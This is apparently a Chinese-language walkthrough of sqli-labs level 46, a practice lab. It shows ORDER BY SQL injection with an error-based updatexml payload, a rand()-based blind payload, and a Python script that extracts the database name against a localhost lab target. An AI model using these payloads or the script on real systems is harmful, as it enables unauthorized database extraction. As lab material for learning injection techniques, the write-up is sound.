sqllabs第46关 order by 注入
一、仔细研究其源码,不难看出id是被放到了order by的后面,如下图所示:
二、尝试用列排序
?sort=username/password
username:
password:
不难看出顺序是不同的,如果想要去实现注入,主要通过rand()去实现盲注或报错注入
报错注入:走第二个,这样就可以实现
?sort=updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1)
盲注:写ture和false排序不同,所以用rand()去进行排序
?sort=rand(ascii(mid((select%20database()),1,1))>114)
三、通过寻找第一个字段,进行爬取判断,若为真则是admin3,因为true=3
# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/25 16:31
@version: 1.0
"""
import requests
import time
from bs4 import BeautifulSoup
"""
查表名
查列名
查具体字段内容
if(ascii(substr(database(),1,1))>100,%20sleep(3),%200)--+
if(ascii(substr(database(),1,1))>110, sleep(3), 0)
"""
def inject_database(url):
name = ''
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (i, mid)
res = {"sort": payload}
r = requests.post(url, params=res)
html = r.text
soup = BeautifulSoup(html,'html.parser')
getUsername = soup.find_all('td')[1].text
if getUsername == 'admin3':
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
if __name__ == "__main__":
url = 'http://127.0.0.1/sqli/Less-46/index.php'
inject_database(url)